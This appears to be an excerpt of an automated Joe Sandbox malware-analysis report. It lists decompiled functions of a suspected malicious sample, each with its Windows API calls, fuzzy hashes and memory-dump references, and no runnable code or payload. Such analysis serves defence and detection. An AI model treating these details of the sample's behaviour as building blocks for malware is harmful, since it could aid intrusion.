Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2f29ece5b79ee4c3d1b412429965847fa69f37a4d4f88b8a343c2cae230f9b8a
Instruction ID: 5d4e76a41b354398cd07cd9223f122fc8fe7180edf090a7bdf6df6f4509d61cd
Opcode Fuzzy Hash: 2f29ece5b79ee4c3d1b412429965847fa69f37a4d4f88b8a343c2cae230f9b8a
Instruction Fuzzy Hash: 5F313C70A60648AEFF34CB6488057FABBB6BF95313F04422AE881565D1D374CA4A8B71

Function 00A880AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00A880D4
GetWindowRect.USER32(?,?), ref: 00A8814A
PtInRect.USER32(?,?,?), ref: 00A8815A
MessageBeep.USER32(00000000), ref: 00A881C6

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: ccfa78165f67007505c896fd0476972611a3fdab5e0cd226ccd399c4e1fcb8f6
Instruction ID: adf8d26dc4e0ba19f177b44f2f4184416e3c48dd4ad3d3a7e8e198b2c28995f0
Opcode Fuzzy Hash: ccfa78165f67007505c896fd0476972611a3fdab5e0cd226ccd399c4e1fcb8f6
Instruction Fuzzy Hash: 74418F34601215DFCB15EF98C888EA9B7F5BF45710F9542A8E9549B2A1CF78A843CB90

Function 00A82176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00A82187

Part of subcall function 00A54393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A543AD
Part of subcall function 00A54393: GetCurrentThreadId.KERNEL32 ref: 00A543B4
Part of subcall function 00A54393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A52F00), ref: 00A543BB

GetCaretPos.USER32(?), ref: 00A8219B
ClientToScreen.USER32(00000000,?), ref: 00A821E8
GetForegroundWindow.USER32 ref: 00A821EE

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 01a17dace3dbc1cb5bede55d5cc60474b85df8dcea1b290cd127110f396628cb
Instruction ID: 3ac363e0980dcbefe435085df655ca7d21b9fd881da3ddb30c2716bb4ea62cdb
Opcode Fuzzy Hash: 01a17dace3dbc1cb5bede55d5cc60474b85df8dcea1b290cd127110f396628cb
Instruction Fuzzy Hash: DC3141B1D0010DAFCB04EFA5C885DBEBBF9EF88314B50446AE515E7251D6719E45CBA0

Function 00A5E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 009F41EA: _wcslen.LIBCMT ref: 009F41EF

_wcslen.LIBCMT ref: 00A5E8E2
_wcslen.LIBCMT ref: 00A5E8F9
_wcslen.LIBCMT ref: 00A5E924
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00A5E92F

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: d23d531a20482c4e010ecf3c077ff1275e9c16ab8ccbb57d08eefce3e492e633
Instruction ID: f89bd83235751341fab415bc4737320f4eca4f75dcfd188cf067846ab2b06216
Opcode Fuzzy Hash: d23d531a20482c4e010ecf3c077ff1275e9c16ab8ccbb57d08eefce3e492e633
Instruction Fuzzy Hash: 6421A375900214EFCB14EFA8D981BEEB7B8FF55350F144065E904AB281D6749E81CBE1

Function 00A89A25 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009F24B0

GetCursorPos.USER32(?), ref: 00A89A5D
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A89A72
GetCursorPos.USER32(?), ref: 00A89ABA
DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00A89AF0

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 0866b48a3c9eaa54cf8d9ff0796fb522917560323f4cfd35c69f232fd3bbd8ed
Instruction ID: d1c0d103dc7969755c4fd3c31d29b5c6192171d380b41534a9851e8091b304d7
Opcode Fuzzy Hash: 0866b48a3c9eaa54cf8d9ff0796fb522917560323f4cfd35c69f232fd3bbd8ed
Instruction Fuzzy Hash: 81219F35600018AFCF29EF94CC48EFBBFB9EB49390F584165F9098B1A1D7719952DB50

Function 00A5DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00A8DC30), ref: 00A5DBA6
GetLastError.KERNEL32 ref: 00A5DBB5
CreateDirectoryW.KERNEL32(?,00000000), ref: 00A5DBC4
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00A8DC30), ref: 00A5DC21

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 3cdada3f016332f4d05f464036dd4e93530e240913c542307643be55ceea2a78
Instruction ID: a8d4f397e623d4989d50979f870b7f822143c07d2f12f184057aa4a753e00b68
Opcode Fuzzy Hash: 3cdada3f016332f4d05f464036dd4e93530e240913c542307643be55ceea2a78
Instruction Fuzzy Hash: 552195705083059F8714EF34C9809ABBBE8FE96365F104A1DF899C72E1D731D94ACB52

Function 00A8321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00A832A6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A832C0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A832CE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00A832DC

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 65fc6e5cf19ba88a151e141f944f759eac315ce7bf8597a0d1e35df652874362
Instruction ID: a3b6ab6f7670fb41e5866b156159caf106b0d32a01878534be74342d34c8c799
Opcode Fuzzy Hash: 65fc6e5cf19ba88a151e141f944f759eac315ce7bf8597a0d1e35df652874362
Instruction Fuzzy Hash: AC21D632205115AFDB14FB24C845FAA7BA5FF91724F248258F8268B2D2D771ED42C7D0

Function 00A5825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A596E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00A58271,?,000000FF,?,00A590BB,00000000,?,0000001C,?,?), ref: 00A596F3
Part of subcall function 00A596E4: lstrcpyW.KERNEL32(00000000,?,?,00A58271,?,000000FF,?,00A590BB,00000000,?,0000001C,?,?,00000000), ref: 00A59719
Part of subcall function 00A596E4: lstrcmpiW.KERNEL32(00000000,?,00A58271,?,000000FF,?,00A590BB,00000000,?,0000001C,?,?), ref: 00A5974A

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00A590BB,00000000,?,0000001C,?,?,00000000), ref: 00A5828A
lstrcpyW.KERNEL32(00000000,?,?,00A590BB,00000000,?,0000001C,?,?,00000000), ref: 00A582B0
lstrcmpiW.KERNEL32(00000002,cdecl,?,00A590BB,00000000,?,0000001C,?,?,00000000), ref: 00A582EB

Strings

cdecl, xrefs: 00A582E2

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: f00190202e64e0562990095d5f20bef89198690ce2742d06a75cf3749dbf9785
Instruction ID: ecf4e2a838b47e07d5b45d4bb5d0f2c24f7413d243339761b7922341de8efdbf
Opcode Fuzzy Hash: f00190202e64e0562990095d5f20bef89198690ce2742d06a75cf3749dbf9785
Instruction Fuzzy Hash: 9F11263A200341BBCB149F78C845EBB77A9FF44761B10412AFD46CB290EF759846C790

Function 00A860FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 00A8615A
_wcslen.LIBCMT ref: 00A8616C
_wcslen.LIBCMT ref: 00A86177
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A862B5

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: ff5dc80bef8a5ff99fb36f53c8537a212b60a77dfd8c3e194621564c42d9d207
Instruction ID: 485f81113c5fd9bf33e6f6a602d9c70ee129ee7960c062e789140a9d7ebde511
Opcode Fuzzy Hash: ff5dc80bef8a5ff99fb36f53c8537a212b60a77dfd8c3e194621564c42d9d207
Instruction Fuzzy Hash: 54119375A00218A6EB10FFA4CC85EEF7BBCEB15354F10412AFA11D6082EB70C941CBA0

Function 00A22079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20b7cc3946bcbde8177f71adb017c4181a72149d2c606f3de64e57012e90109
Instruction ID: 4da1bfe261bacabe65a72641c56f9f4084367d1278b82115a2ec1050d0aad09a
Opcode Fuzzy Hash: b20b7cc3946bcbde8177f71adb017c4181a72149d2c606f3de64e57012e90109
Instruction Fuzzy Hash: 3B01ADB22092267EF6212ABCBCC0F27671DDF817B8B310735F521A51D2DE608C808760

Function 00A52374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00A52394
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A523A6
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A523BC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A523D7

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 71ba410e6f556344939688182d488948f000466f6485165b49198aaf8ca7b425
Instruction ID: f65f5338d1fddb37699f6fa88be25762bc1937f7cc5afd9e067fad3282132614
Opcode Fuzzy Hash: 71ba410e6f556344939688182d488948f000466f6485165b49198aaf8ca7b425
Instruction Fuzzy Hash: 1C11093A900218FFEF11DBA5CD85F9DBB78FB09760F200091EA01BB290D6716E15DB94

Function 009F1AAC Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 009F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009F24B0

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 009F1AF4
GetClientRect.USER32(?,?), ref: 00A331F9
GetCursorPos.USER32(?), ref: 00A33203
ScreenToClient.USER32(?,?), ref: 00A3320E

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 9503e0d6f348c294dcfdf2bf3c913386186e96dcbaff40f9b227ec9b1a962039
Instruction ID: 430afaa558e4bb924b38f3f5105e8a884880ae113d12559ef57f7cf3d06fb23e
Opcode Fuzzy Hash: 9503e0d6f348c294dcfdf2bf3c913386186e96dcbaff40f9b227ec9b1a962039
Instruction Fuzzy Hash: 3E113A32A0101DEBDF04EFA4C945AFE77B8EF45350F100552FA12E2140D771BA92DBA1

Function 00A5EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A5EB14
MessageBoxW.USER32(?,?,?,?), ref: 00A5EB47
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A5EB5D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00A5EB64

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 09b0a7fc6ec2beb211732066ce766b77edce362ccbfb2a76d4b516155a3e47d0
Instruction ID: 68ecb5a13b8d79983b088cb8e1000c7f394c25eebff1c97f2f6b7af22c31c38a
Opcode Fuzzy Hash: 09b0a7fc6ec2beb211732066ce766b77edce362ccbfb2a76d4b516155a3e47d0
Instruction Fuzzy Hash: 911126B6900258BBC705EBE89C09E9E7FADFB45322F118256F815E73D0D6748A0987A0

Function 00A1D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00A1D369,00000000,00000004,00000000), ref: 00A1D588
GetLastError.KERNEL32 ref: 00A1D594
__dosmaperr.LIBCMT ref: 00A1D59B
ResumeThread.KERNEL32(00000000), ref: 00A1D5B9

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: f266876aaf72fff208213363b1a1b75421e17a89a72aed6067a1f2717879029e
Instruction ID: daeb5a7bab583c186a3c5a638d938d6b309fe1a895774224497afcf8d45bb195
Opcode Fuzzy Hash: f266876aaf72fff208213363b1a1b75421e17a89a72aed6067a1f2717879029e
Instruction Fuzzy Hash: 7901B572404214BBDB116FA9EC09FEA7B6AEF81735F100319F9258A1E0DB719981C7A1

Function 009F7873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009F78B1
GetStockObject.GDI32(00000011), ref: 009F78C5
SendMessageW.USER32(00000000,00000030,00000000), ref: 009F78CF

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: b2119eb3955290e703e1c5b068a8e2839f0ca5760d9a824e796397ba138f434c
Instruction ID: c66f308d44ba8b3a8db6dd9e5ab404c418450d67867fc7137579db5fae9d3d1c
Opcode Fuzzy Hash: b2119eb3955290e703e1c5b068a8e2839f0ca5760d9a824e796397ba138f434c
Instruction Fuzzy Hash: FF117572505148BFEB129FD09C98EEABB6DFF083A4F040116FA0152160D7359C60EBA0

Function 00A233E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00A2338D,00000364,00000000,00000000,00000000,?,00A235FE,00000006,FlsSetValue), ref: 00A23418
GetLastError.KERNEL32(?,00A2338D,00000364,00000000,00000000,00000000,?,00A235FE,00000006,FlsSetValue,00A93260,FlsSetValue,00000000,00000364,?,00A231B9), ref: 00A23424
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A2338D,00000364,00000000,00000000,00000000,?,00A235FE,00000006,FlsSetValue,00A93260,FlsSetValue,00000000), ref: 00A23432

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 1ea62b59ca204b8a44dd1c600f12fe7b0ad557fed63736541a600c7530f872a5
Instruction ID: 8ab9ba1625b1d87ed3cb92f4faf095b7c6fd050d365733de0d6dfa00ace20050
Opcode Fuzzy Hash: 1ea62b59ca204b8a44dd1c600f12fe7b0ad557fed63736541a600c7530f872a5
Instruction Fuzzy Hash: 1001D833611232ABCF229BBDBC44D563B68AF16B727210670F906D7180D724DE02C7E0

Function 00A5BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00A5B69A,?,00008000), ref: 00A5BA8B
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A5B69A,?,00008000), ref: 00A5BAB0
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00A5B69A,?,00008000), ref: 00A5BABA
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A5B69A,?,00008000), ref: 00A5BAED

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 3134723cf15cd567e39ce3bca4f806737d7bd1368f18c5ea8d1b3b4ad1f24dbc
Instruction ID: 58bf95cd1b86ad3dbe6720648b7869013aa8ce0ce327eefefeccc3810cd16749
Opcode Fuzzy Hash: 3134723cf15cd567e39ce3bca4f806737d7bd1368f18c5ea8d1b3b4ad1f24dbc
Instruction Fuzzy Hash: 94115B31C1162DEBCF00EFE9E9496EEBB78FF09752F104195DA41B2280DB309655CBA5

Function 00A8886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00A8888E
ScreenToClient.USER32(?,?), ref: 00A888A6
ScreenToClient.USER32(?,?), ref: 00A888CA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A888E5

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
